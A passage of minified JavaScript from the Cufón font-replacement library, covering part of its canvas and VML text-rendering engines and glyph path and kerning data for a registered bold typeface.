X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"116,-162v-1,-21,6,-53,-15,-53v-19,0,-19,13,-19,86v0,75,1,87,19,87v12,0,16,-12,16,-44r0,-20r70,0v3,69,-18,111,-87,111v-93,0,-92,-52,-92,-134v0,-80,-1,-133,92,-133v86,0,87,44,86,100r-70,0","w":193},{"d":"76,10v0,10,5,15,14,15v26,0,15,-34,17,-56v-9,19,-26,25,-45,25v-46,0,-55,-50,-55,-95v0,-44,3,-99,60,-99v23,-1,34,11,44,29r0,-24r66,0r0,187v0,57,-35,74,-86,74v-73,0,-77,-33,-79,-56r64,0xm108,-98v0,-36,-1,-50,-15,-50v-14,0,-16,14,-16,50v0,27,2,42,15,42v14,0,16,-15,16,-42","w":186,"k":{"y":2,".":6,",":6}},{"d":"158,73v-27,19,-83,22,-81,-21v0,-14,9,-30,30,-52v-4,-7,-1,-16,-4,-21v-21,46,-103,30,-98,-32v5,-59,37,-58,79,-68v23,1,25,-36,6,-36v-15,0,-17,12,-17,23r-61,0v0,-44,22,-66,78,-66v130,0,50,110,83,200r-36,0v-15,22,-25,26,-25,48v0,22,25,14,38,6xm103,-94v-11,6,-36,11,-31,32v0,12,4,20,14,20v22,-2,16,-30,17,-52","k":{"y":2,"w":2,"v":2}},{"d":"10,0r0,-195r67,0v1,9,-2,22,1,29v8,-22,27,-38,53,-33r0,64v-31,-4,-51,1,-51,34r0,101r-70,0","w":133,"k":{"\u010d":4,"\u0105":4,"\u00e4":4,"y":-6,"v":-6,"c":4,"a":4,".":27,"-":13,",":27}},{"d":"12,0r0,-257r69,0r0,257r-69,0","w":92},{"d":"10,0r0,-257r72,0r0,257r-72,0","w":92},{"d":"116,-162v-1,-21,6,-53,-15,-53v-19,0,-19,13,-19,86v0,75,1,87,19,87v12,0,16,-12,16,-44r0,-20r70,0v3,69,-18,111,-87,111v-93,0,-92,-52,-92,-134v0,-80,-1,-133,92,-133v86,0,87,44,86,100r-70,0xm63,-274r-21,-51r45,0r13,29r11,-29r47,0r-21,51r-74,0","w":193},{"d":"94,-210v-17,0,-17,15,-17,39v0,25,0,39,17,39v17,0,17,-14,17,-39v0,-24,0,-39,-17,-39xm10,-63r67,0v-1,14,2,23,16,23v20,4,14,-36,15,-58v-10,13,-26,18,-42,18v-56,0,-61,-46,-61,-78v0,-65,21,-97,89,-97v87,0,89,59,89,120v0,75,0,140,-89,140v-56,0,-82,-15,-84,-68","w":187},{"d":"0,45r0,-18r180,0r0,18r-180,0"},{"d":"17,-64r0,-54r182,-69r0,49r-124,47r124,46r0,50","w":216},{"d":"119,-95r-16,-106r-17,106r33,0xm135,0r-8,-39r-48,0r-7,39r-75,0r61,-257r91,0r60,257r-74,0","w":206,"k":{"\u0172":6,"\u016a":6,"\u00dc":6,"y":11,"w":9,"v":9,"p":-4,"Y":27,"W":13,"V":13,"U":6,"T":20,"G":6}},{"d":"109,0r0,-22v-21,39,-99,41,-99,-22r0,-151r70,0r0,129v0,15,4,19,13,19v10,0,14,-8,14,-19r0,-129r70,0r0,195r-68,0","w":186},{"d":"99,-174v13,-3,34,-48,2,-47v-32,2,-12,37,-2,47xm154,0r-10,-14v-18,13,-44,19,-65,19v-108,0,-91,-117,-28,-146v-45,-39,-27,-119,46,-119v45,0,80,15,80,59v0,32,-21,50,-44,68r25,35v4,-9,9,-18,9,-28r61,0v-2,30,-15,60,-34,77r36,49r-76,0xm116,-56r-31,-42v-5,3,-16,13,-16,27v-2,22,35,28,47,15","w":226},{"d":"14,0r0,-257r155,0r0,58r-83,0r0,40r77,0r0,56r-77,0r0,103r-72,0","w":173,"k":{"\u0105":4,"\u0104":13,"\u00e4":4,"\u00c4":13,"a":4,"A":13,".":40,",":40}},{"d":"90,-147r19,-48r72,0r-51,94r51,101r-69,0r-20,-53r-21,53r-72,0r53,-101r-49,-94r70,0","k":{"\u0119":2,"\u0117":2,"e":2}},{"d":"107,0r0,-129v0,-15,-4,-19,-13,-19v-10,0,-14,8,-14,19r0,129r-70,0r0,-195r67,0v1,7,-2,18,1,23v21,-40,99,-42,99,22r0,150r-70,0","w":186},{"d":"109,0r0,-22v-21,39,-99,41,-99,-22r0,-151r70,0r0,129v0,15,4,19,13,19v10,0,14,-8,14,-19r0,-129r70,0r0,195r-68,0xm35,-221r0,-37r117,0r0,37r-117,0","w":186},{"d":"16,-118r0,-139r61,0r0,139r-61,0","w":93},{"d":"12,-210r0,-50r69,0r0,50r-69,0xm12,0r0,-195r69,0r0,195r-69,0","w":92},{"d":"110,-98v0,-36,-2,-50,-16,-50v-14,0,-16,14,-16,50v0,37,2,51,16,51v14,0,16,-14,16,-51xm10,0r0,-257r70,0r0,85v7,-18,24,-28,43,-28v49,0,57,46,57,100v0,46,0,105,-61,105v-32,0,-35,-19,-41,-27r0,22r-68,0","w":186,"k":{"y":4,"v":2,".":6,",":6}},{"d":"33,17r0,-224r-37,0r0,-50r101,0r0,323r-101,0r0,-49r37,0","w":119},{"d":"53,0r-54,-195r72,0r18,118r16,-118r70,0r-50,193v-8,58,-46,72,-107,62r0,-45v16,3,35,2,35,-15","w":173,"k":{"\u0119":4,"\u0117":4,"\u0105":4,"\u00f6":4,"\u00e4":4,"o":4,"e":4,"a":4,".":20,",":20}},{"d":"15,-118r0,-77r63,0r0,77r-63,0xm15,-2r0,-74r63,0v-2,69,14,140,-63,139r0,-32v17,-1,23,-7,24,-33r-24,0","w":93},{"d":"82,-117r0,-65r52,0r0,65r65,0r0,52r-65,0r0,65r-52,0r0,-65r-65,0r0,-52r65,0","w":216},{"d":"90,-200v130,0,50,110,83,200r-66,0v-4,-7,-1,-16,-4,-21v-21,46,-103,30,-98,-32v5,-59,37,-58,79,-68v23,1,25,-36,6,-36v-15,0,-17,12,-17,23r-61,0v0,-44,22,-66,78,-66xm103,-94v-11,6,-36,11,-31,32v0,12,4,20,14,20v22,-2,16,-30,17,-52xm97,-214r0,-52r52,0r0,52r-52,0xm32,-214r0,-52r52,0r0,52r-52,0","k":{"y":2,"w":2,"v":2}},{"d":"206,0r0,-129v0,-15,-5,-19,-14,-19v-10,0,-14,8,-14,19r0,129r-70,0r0,-129v0,-15,-4,-19,-13,-19v-10,0,-14,8,-14,19r0,129r-70,0r0,-195r67,0v1,7,-2,18,1,23v18,-35,80,-40,98,0v20,-41,99,-41,99,22r0,150r-70,0","w":286},{"d":"100,-139v0,-12,-4,-20,-17,-20v-7,0,-15,3,-15,14v0,9,10,13,52,27v19,7,43,17,43,58v0,48,-37,65,-80,65v-50,0,-78,-13,-79,-68r61,0v-8,29,33,34,33,12v0,-9,-2,-12,-28,-21v-45,-15,-65,-27,-65,-62v0,-39,22,-66,76,-66v78,0,78,43,78,61r-59,0","w":166,"k":{"w":4}},{"d":"117,-73r0,-184r72,0v-9,110,39,262,-89,262v-70,0,-88,-28,-88,-92r0,-170r72,0r0,184v0,22,2,31,16,31v14,0,17,-9,17,-31xm42,-281r0,-37r117,0r0,37r-117,0","w":200,"k":{"\u0104":6,"\u00c4":6,"A":6,".":6,",":6}},{"d":"108,-97v0,-37,-1,-51,-15,-51v-14,0,-16,14,-16,51v0,36,2,50,16,50v14,0,15,-14,15,-50xm108,-195r69,0r0,258r-70,0r0,-86v-7,18,-25,28,-44,28v-49,0,-56,-44,-56,-99v0,-46,0,-106,61,-106v30,0,37,19,40,28r0,-23","w":186},{"d":"191,-63v0,23,-5,55,11,59r0,4r-76,0v-9,-16,-7,-51,-7,-75v0,-28,-11,-26,-33,-26r0,101r-72,0r0,-257r108,0v50,0,71,24,71,67v1,42,-20,56,-43,63v29,-1,41,31,41,64xm86,-205r0,56v21,1,35,0,35,-30v0,-24,-14,-27,-35,-26","w":206,"k":{"Y":6,"W":4,"V":4,"T":6}},{"d":"24,5r0,-267r52,0r0,267r-52,0","w":100},{"d":"15,-118v2,-69,-14,-140,63,-139r0,32v-17,2,-22,6,-23,33r23,0r0,74r-63,0xm102,-118v2,-69,-14,-140,63,-139r0,32v-17,2,-23,6,-24,33r24,0r0,74r-63,0","k":{"\u0104":20,"\u00c4":20,"A":20}},{"d":"89,5v-116,4,-67,-158,-77,-262r72,0r0,184v0,22,2,31,16,31v14,0,17,-9,17,-31r0,-184r72,0v-10,99,37,246,-66,261v-19,17,-27,22,-31,44v1,22,28,14,43,6r8,19v-29,18,-92,24,-90,-21v1,-21,17,-35,36,-47","w":200,"k":{"\u0104":6,"\u00c4":6,"A":6,".":6,",":6}},{"d":"102,-93r0,-47r88,0r0,140r-50,0v-1,-6,1,-16,-2,-21v-12,23,-32,26,-53,26v-73,0,-75,-64,-75,-133v0,-73,4,-134,92,-134v71,0,86,35,86,87r-67,0v1,-21,-2,-40,-19,-40v-17,0,-18,16,-18,32r0,106v0,16,2,35,19,35v23,1,20,-28,20,-51r-21,0","w":200},{"d":"14,0r0,-257r155,0r0,58r-83,0r0,40r77,0r0,56r-77,0r0,45r86,0r0,58r-158,0xm67,-274r0,-51r52,0r0,51r-52,0"},{"d":"170,-84v1,63,-20,88,-80,89v-77,0,-85,-48,-85,-103v0,-55,8,-102,85,-102v64,0,80,24,80,82r-64,0v1,-20,-1,-36,-16,-36v-13,0,-15,7,-15,56v0,48,1,58,15,58v13,0,17,-10,17,-44r63,0","w":173,"k":{"y":4,".":6,",":6}},{"d":"113,-186r8,-64r43,0r-8,64r26,0r0,43r-32,0r-4,36r26,0r0,43r-32,0r-8,64r-43,0r8,-64r-23,0r-8,64r-43,0r8,-64r-26,0r0,-43r32,0r4,-36r-26,0r0,-43r32,0r8,-64r43,0r-8,64r23,0xm103,-107r4,-36r-23,0r-4,36r23,0","w":187},{"d":"12,0r0,-187v0,-56,26,-75,88,-75v76,0,80,37,80,70v0,25,-9,39,-31,48v30,8,36,28,36,57v0,68,-24,99,-94,88r0,-45v14,5,25,1,25,-24v-1,-24,6,-56,-25,-50r0,-47v15,4,21,-2,21,-22v0,-21,-4,-30,-15,-30v-9,0,-18,2,-18,32r0,185r-67,0","w":193},{"d":"160,73v-27,19,-81,22,-81,-21v0,-14,14,-34,30,-52r0,-22v-21,39,-99,41,-99,-22r0,-151r70,0r0,129v0,15,4,19,13,19v10,0,14,-8,14,-19r0,-129r70,0r0,195r-39,0v-19,26,-24,36,-24,48v1,22,25,14,38,6","w":186},{"d":"96,-167v11,-27,15,-61,24,-90r78,0r-65,156r0,101r-72,0r0,-101r-65,-156r80,0","w":193,"k":{"\u0173":23,"\u016b":23,"\u012f":6,"\u0119":33,"\u0117":33,"\u0105":33,"\u0104":27,"\u00fc":23,"\u00f6":33,"\u00e4":33,"\u00d6":9,"\u00c4":27,"u":23,"o":33,"i":6,"e":33,"a":33,"O":9,"A":27,";":13,":":13,".":40,"-":40,",":40}},{"d":"90,-200v130,0,50,110,83,200r-66,0v-4,-7,-1,-16,-4,-21v-21,46,-103,30,-98,-32v5,-59,37,-58,79,-68v23,1,25,-36,6,-36v-15,0,-17,12,-17,23r-61,0v0,-44,22,-66,78,-66xm103,-94v-11,6,-36,11,-31,32v0,12,4,20,14,20v22,-2,16,-30,17,-52","k":{"y":2,"w":2,"v":2}},{"d":"45,0r-46,-195r72,0r16,135r18,-135r70,0r-48,195r-82,0","w":173,"k":{"\u0119":4,"\u0117":4,"\u0105":4,"\u00f6":4,"\u00e4":4,"o":4,"e":4,"a":4,".":20,",":20}},{"d":"100,-139v0,-12,-4,-20,-17,-20v-7,0,-15,3,-15,14v0,9,10,13,52,27v19,7,43,17,43,58v0,48,-37,65,-80,65v-50,0,-78,-13,-79,-68r61,0v-8,29,33,34,33,12v0,-9,-2,-12,-28,-21v-45,-15,-65,-27,-65,-62v0,-39,22,-66,76,-66v78,0,78,43,78,61r-59,0xm46,-214r-20,-52r45,0r13,29r10,-29r48,0r-21,52r-75,0","w":166,"k":{"w":4}},{"d":"156,0v-21,20,-31,24,-35,48v1,22,28,14,43,6r8,19v-29,18,-90,24,-90,-21v0,-14,11,-32,43,-52r-111,0r0,-257r155,0r0,58r-83,0r0,40r77,0r0,56r-77,0r0,45r86,0r0,58r-16,0"},{"d":"69,0v-21,20,-31,24,-35,48v1,22,28,14,43,6r8,19v-29,18,-90,24,-90,-21v0,-14,11,-32,43,-52r-26,0r0,-195r69,0r0,195r-12,0xm12,-210r0,-50r69,0r0,50r-69,0","w":92},{"d":"110,-97v0,-37,-2,-51,-16,-51v-14,0,-16,14,-16,51v0,36,2,50,16,50v14,0,16,-14,16,-50xm10,63r0,-258r68,0v1,7,-2,18,1,23v3,-9,9,-28,40,-28v61,0,61,60,61,106v0,55,-8,99,-57,99v-19,0,-36,-10,-43,-28r0,86r-70,0","w":186,"k":{"y":4}},{"d":"188,-179r2,-13r34,0r-17,92v0,5,2,8,6,8v12,0,28,-16,28,-56v0,-50,-37,-77,-92,-77v-59,0,-95,39,-95,97v0,90,105,119,171,78r39,0v-26,36,-62,55,-120,55v-74,0,-134,-60,-134,-134v0,-74,60,-133,134,-133v71,0,134,41,134,108v0,61,-53,97,-92,97v-13,0,-18,-8,-23,-15v-33,33,-92,8,-92,-47v0,-63,74,-112,117,-60xm139,-95v38,3,50,-67,8,-67v-38,-2,-45,65,-8,67","w":288},{"d":"117,-73r0,-184r72,0v-9,110,39,262,-89,262v-70,0,-88,-28,-88,-92r0,-170r72,0r0,184v0,22,2,31,16,31v14,0,17,-9,17,-31xm108,-274r0,-51r51,0r0,51r-51,0xm42,-274r0,-51r52,0r0,51r-52,0","w":200,"k":{"\u0104":6,"\u00c4":6,"A":6,".":6,",":6}},{"d":"73,0v-21,20,-31,24,-35,48v1,22,28,14,43,6r8,19v-29,18,-90,24,-90,-21v0,-14,11,-32,43,-52r-32,0r0,-257r72,0r0,257r-9,0","w":92},{"d":"6,-53r66,-88r-62,0r0,-54r148,0r0,52r-69,89r71,0r0,54r-154,0r0,-53","w":166,"k":{"\u0119":2,"\u0117":2,"\u00f6":2,"o":2,"e":2}},{"d":"109,0r0,-22v-21,39,-99,41,-99,-22r0,-151r70,0r0,129v0,15,4,19,13,19v10,0,14,-8,14,-19r0,-129r70,0r0,195r-68,0xm100,-214r0,-52r52,0r0,52r-52,0xm35,-214r0,-52r52,0r0,52r-52,0","w":186},{},{"d":"114,-195r75,0r-54,81r59,114r-74,0r-30,-64v-13,12,-10,39,-10,64r-70,0r0,-257r71,0r0,122","w":186,"k":{"\u0119":2,"\u0117":2,"\u00f6":2,"o":2,"e":2}},{"d":"20,-195v-11,-63,33,-73,94,-66r0,44v-19,-1,-28,3,-24,22r24,0r0,46r-24,0r0,149r-70,0r0,-149r-21,0r0,-46r21,0","w":113,"k":{".":13,",":13}},{"d":"-6,5r80,-267r58,0r-79,267r-59,0","w":126},{},{"d":"94,5v-79,0,-89,-33,-89,-130v0,-98,10,-130,89,-130v78,0,89,34,89,130v0,97,-11,130,-89,130xm77,-125v0,49,-11,77,17,85v27,-8,11,-37,17,-85v-5,-48,9,-76,-17,-85v-29,8,-17,37,-17,85","w":187},{"d":"105,-123v1,-19,-1,-39,-16,-36v-13,-3,-15,18,-14,36r30,0xm168,-68v1,51,-29,73,-78,73v-77,0,-85,-48,-85,-103v0,-55,8,-102,85,-102v80,0,80,51,80,114r-95,0v2,21,-7,50,15,50v13,0,15,-12,15,-32r63,0xm64,-214r0,-52r52,0r0,52r-52,0","w":173,"k":{"y":2,"x":4,"w":2,"v":2}},{"d":"0,66r0,-49v69,13,-3,-114,72,-113v-47,0,-39,-44,-39,-89v0,-19,-13,-24,-33,-22r0,-50v50,-2,97,-2,97,49v0,30,-7,89,23,82r0,61v-29,-7,-23,52,-23,82v0,51,-46,51,-97,49","w":119},{"d":"53,-262r79,267r-58,0r-80,-267r59,0","w":126},{"d":"15,-118r0,-77r63,0r0,77r-63,0xm15,-2r0,-74r63,0v-2,69,14,140,-63,139r0,-32v17,-1,23,-7,24,-33r-24,0","w":93},{"d":"102,-2r0,-74r63,0v-2,69,14,140,-63,139r0,-32v17,-1,22,-7,23,-33r-23,0xm15,-2r0,-74r63,0v-2,69,14,140,-63,139r0,-32v17,-1,23,-7,24,-33r-24,0"},{"d":"8,-129v0,-80,-1,-133,92,-133v93,0,93,53,93,133v0,82,0,134,-93,134v-93,0,-92,-52,-92,-134xm118,-129v0,-75,-3,-86,-18,-86v-15,0,-18,11,-18,86v0,75,3,87,18,87v15,0,18,-12,18,-87xm107,-274r0,-51r52,0r0,51r-52,0xm42,-274r0,-51r52,0r0,51r-52,0","w":200,"k":{"\u0104":4,"\u00c4":4,"Y":11,"X":6,"V":4,"A":4,".":6,",":6}},{"d":"14,0r0,-257r72,0r0,199r79,0r0,58r-151,0","w":166,"k":{"y":13,"Y":40,"W":27,"V":27,"T":27}},{"d":"7,-49r76,-150r-71,0r0,-58r154,0r0,50r-78,149r78,0r0,58r-159,0r0,-49xm54,-274r-21,-51r45,0r13,29r11,-29r47,0r-21,51r-74,0","w":173},{"d":"9,-189r0,-61r169,0r0,53v-36,51,-56,139,-64,197r-74,0v9,-65,27,-135,69,-189r-100,0","w":187},{"d":"17,5r0,-50r124,-46r-124,-47r0,-49r182,69r0,54","w":216},{"d":"-1,-188r11,-36r44,17r0,-50r37,0r0,50r45,-17r12,36r-45,16r28,40r-30,22r-28,-41r-28,41r-30,-22r30,-40","w":146},{"d":"62,11r115,-272r42,0r-116,272r-41,0xm63,-117v-48,0,-58,-24,-58,-69v0,-45,10,-69,58,-69v48,0,58,24,58,69v0,45,-10,69,-58,69xm63,-147v10,0,10,-12,10,-39v0,-27,0,-39,-10,-39v-10,0,-11,12,-11,39v0,27,1,39,11,39xm217,5v-48,0,-58,-24,-58,-69v0,-45,10,-69,58,-69v48,0,58,24,58,69v0,45,-10,69,-58,69xm217,-25v10,0,11,-12,11,-39v0,-27,-1,-39,-11,-39v-10,0,-10,12,-10,39v0,27,0,39,10,39","w":280},{"d":"95,-75r0,-182r72,0r0,185v0,56,-33,77,-86,77v-90,0,-79,-50,-80,-89r65,0v0,18,-3,43,15,42v13,0,14,-10,14,-33","k":{"\u0105":4,"\u00e4":4,"a":4,".":13,",":13}},{"d":"54,0r0,-60r66,0r0,60r-66,0xm10,-176v-6,-51,34,-86,81,-86v17,0,77,3,77,72v0,35,-25,60,-43,80v-7,8,-7,21,-7,33r-63,0v-4,-46,16,-71,38,-92v13,-13,16,-46,-4,-50v-16,1,-17,24,-16,43r-63,0"},{"d":"75,-98v0,45,2,58,15,58v13,0,15,-13,15,-58v0,-45,-2,-57,-15,-57v-13,0,-15,12,-15,57xm90,-200v77,0,85,47,85,102v0,55,-8,103,-85,103v-77,0,-85,-48,-85,-103v0,-55,8,-102,85,-102xm97,-214r0,-52r52,0r0,52r-52,0xm31,-214r0,-52r52,0r0,52r-52,0","k":{"y":6,"x":4,"w":2,"v":2}},{"d":"-1,-197r0,-60r169,0r0,60r-48,0r0,197r-72,0r0,-197r-49,0","w":167,"k":{"\u0173":27,"\u016b":27,"\u0119":27,"\u0117":27,"\u0105":27,"\u0104":20,"\u00fc":27,"\u00f6":27,"\u00e4":27,"\u00c4":20,"y":20,"w":27,"u":27,"r":20,"o":27,"e":27,"a":27,"A":20,";":18,":":18,".":33,"-":20,",":33}},{"d":"15,-2r0,-74r63,0v-2,69,14,140,-63,139r0,-32v17,-1,23,-7,24,-33r-24,0","w":93},{"d":"179,-185v0,76,-53,83,-84,131r85,0r0,54r-173,0v-3,-79,67,-111,98,-166v4,-13,7,-46,-13,-44v-19,2,-14,24,-15,42r-67,0v0,-63,21,-87,84,-87v76,0,85,37,85,70","w":187},{"d":"27,0r0,-60r66,0r0,60r-66,0xm26,-171r0,-86r68,0v1,64,-2,123,-7,180r-54,0","w":120},{"d":"12,-210r0,-50r69,0r0,50r-69,0xm81,-195r0,196v5,64,-32,65,-93,61r0,-47v12,1,24,5,24,-14r0,-196r69,0","w":92},{"d":"75,37r0,-32v-48,-3,-73,-25,-71,-80r70,0v0,18,-1,36,17,35v25,0,23,-44,3,-48v-37,-21,-88,-19,-88,-87v0,-52,24,-77,69,-80r0,-28r28,0r0,28v63,3,74,36,74,77r-68,0v0,-16,1,-32,-16,-32v-11,0,-17,9,-17,20v0,50,107,24,107,114v0,61,-26,79,-80,81r0,32r-28,0","w":187},{"d":"65,-257r59,0v-59,94,-55,229,0,323r-59,0v-67,-95,-68,-230,0,-323","w":119},{"d":"170,-84v1,63,-20,88,-80,89v-77,0,-85,-48,-85,-103v0,-55,8,-102,85,-102v64,0,80,24,80,82r-64,0v1,-20,-1,-36,-16,-36v-13,0,-15,7,-15,56v0,48,1,58,15,58v13,0,17,-10,17,-44r63,0xm53,-214r-20,-52r45,0r13,29r10,-29r48,0r-22,52r-74,0","w":173,"k":{"y":4,".":6,",":6}},{"d":"11,-187v0,-55,40,-68,83,-68v43,0,82,13,82,68v1,24,-15,44,-34,53v12,4,41,8,41,61v0,55,-25,78,-89,78v-64,0,-89,-23,-89,-78v0,-55,29,-55,40,-62v-22,-7,-34,-29,-34,-52xm111,-76v0,-22,0,-36,-17,-36v-17,0,-17,14,-17,36v0,21,0,36,17,36v17,0,17,-15,17,-36xm108,-181v0,-14,1,-29,-14,-29v-23,1,-22,57,0,58v15,0,14,-15,14,-29","w":187},{"d":"8,-75r0,-59r117,0r0,59r-117,0","w":133},{"d":"86,-205r0,49v19,1,31,0,32,-24v1,-21,-11,-27,-32,-25xm14,0r0,-257v77,2,176,-18,176,64v0,41,-25,54,-41,58v14,2,47,9,47,61v0,94,-97,72,-182,74xm86,-111r0,59v23,2,36,-5,36,-28v0,-22,-11,-34,-36,-31","w":206,"k":{"\u0104":4,"\u00c4":4,"A":4,".":4,",":4}},{"d":"119,-95r-16,-106r-17,106r33,0xm135,0r-8,-39r-48,0r-7,39r-75,0r61,-257r91,0r60,257r-74,0xm110,-274r0,-51r52,0r0,51r-52,0xm45,-274r0,-51r51,0r0,51r-51,0","w":206,"k":{"\u0172":6,"\u016a":6,"\u00dc":6,"y":11,"w":9,"v":9,"p":-4,"Y":27,"W":13,"V":13,"U":6,"T":20,"G":6}},{"d":"107,0r0,-129v0,-15,-4,-19,-13,-19v-10,0,-14,8,-14,19r0,129r-70,0r0,-257r70,0r0,85v21,-41,97,-41,97,22r0,150r-70,0","w":186,"k":{"y":4}},{"d":"15,0r0,-76r63,0r0,76r-63,0","w":93},{"d":"0,-65r0,-61v29,7,23,-53,23,-82v0,-51,46,-51,97,-49r0,50v-71,-14,2,113,-72,112v46,1,38,45,38,89v0,19,13,25,34,23r0,49v-50,2,-97,2,-97,-49v0,-30,6,-89,-23,-82","w":119},{"d":"137,-255r0,255r-72,0r0,-170r-48,0r0,-46v33,1,61,-8,68,-39r52,0","w":187},{"d":"7,-49r76,-150r-71,0r0,-58r154,0r0,50r-78,149r78,0r0,58r-159,0r0,-49","w":173},{"d":"108,-98v0,-36,-1,-50,-15,-50v-14,0,-16,14,-16,50v0,37,2,51,16,51v14,0,15,-14,15,-51xm107,-257r70,0r0,257r-69,0r0,-22v-3,9,-10,27,-40,27v-61,0,-61,-59,-61,-105v0,-54,7,-100,56,-100v19,0,37,10,44,28r0,-85","w":186},{"d":"10,-108r4,-142r154,0r0,54r-99,0v0,13,-3,30,-1,41v7,-13,25,-22,44,-22v56,0,67,33,67,89v0,62,-20,93,-85,93v-36,0,-92,-12,-86,-83r68,0v0,16,-1,38,15,38v16,0,16,-13,16,-44v0,-30,-1,-44,-16,-44v-12,0,-15,10,-15,20r-66,0","w":187},{"d":"16,-118r0,-139r61,0r0,139r-61,0xm103,-118r0,-139r61,0r0,139r-61,0"},{"d":"40,0r-40,-195r69,0r15,135r19,-135r72,0r18,135r15,-135r66,0r-39,195r-81,0r-17,-126r-17,126r-80,0","w":273,"k":{"\u0119":2,"\u0117":2,"\u0105":6,"\u00f6":2,"\u00e4":6,"o":2,"e":2,"a":6,".":13,",":13}},{"d":"130,-100v4,-49,0,-106,1,-157r67,0r0,257r-77,0r-40,-158r0,158r-66,0r0,-257r78,0","w":213,"k":{".":6,",":6}},{"d":"14,0r0,-257v87,0,183,-15,179,80v-3,65,-44,84,-107,80r0,97r-72,0xm86,-205r0,56v20,0,31,2,32,-28v1,-21,-10,-30,-32,-28","w":200,"k":{"\u0119":11,"\u0117":11,"\u0105":14,"\u0104":27,"\u00f6":11,"\u00e4":14,"\u00c4":27,"o":11,"e":11,"a":14,"A":27,".":56,",":56}},{"d":"14,0r0,-257v64,3,146,-13,168,33v10,21,14,34,14,95v0,56,-2,129,-77,129r-105,0xm86,-205r0,153v55,9,32,-67,36,-114v2,-30,-7,-41,-36,-39